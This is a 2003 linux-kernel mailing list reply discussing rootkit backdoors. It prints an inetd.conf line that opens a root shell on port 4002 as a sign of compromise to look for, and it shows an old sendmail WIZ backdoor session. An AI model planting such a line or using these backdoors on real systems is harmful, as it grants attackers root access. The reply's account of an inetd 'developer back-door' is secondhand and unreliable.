Re: [OT] Rootkit queston

[Richard B. Johnson]

On Sat, 6 Dec 2003, Samium Gromoff wrote:

>
> On Mon, 1 Dec 2003, Richard B. Johnson wrote:
> > You can check for a common 'root attack', if you have inetd,
> > by looking at the last few lines in /etc/inetd.conf.
> > It may have some access port added that allows anybody
> > who knows about it to log in as root from the network.
> > It will look something like this:
> >
> > # End of inetd.conf.
> > 4002 stream tcp nowait root /bin/bash --
> >
> > In this case, port 4002 will allow access to a root shell
> > that has no terminal processing, but an attacker can use this
> > to get complete control of your system. FYI, this is a 5-year-old
> > attack, long obsolete if you have a "store-bought" distribution
> > more recent.
>
> How is it an attack?
> 	(in order to write to inetd.conf you need to be root already)
>
> And if it is, what does it accomplish?
> 	(writing a daemon listening on a $BELOVED_PORT port is trivial)
>
> regards, Samium Gromoff
>

The explaination I read about on the web was that inetd had a
developer's "back-door". If you knew about it, you could write
to inetd.conf, which had been opened r/w. Other back doors existed
in other network daemons also. The first exposed one was in
sendmail. You could do:
		telnet dumb.victum.com 25
		victum.com Sendmail 1.2.0 ready at Mon, Dec 4 1998
08:00:00 -0500
		WIZ
		220 Oh great leader.
		#

.... and you had a root-shell.

Cheers,
Dick Johnson
Penguin : Linux version 2.4.22 on an i686 machine (797.90 BogoMips).
            Note 96.31% of all statistics are fiction.


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/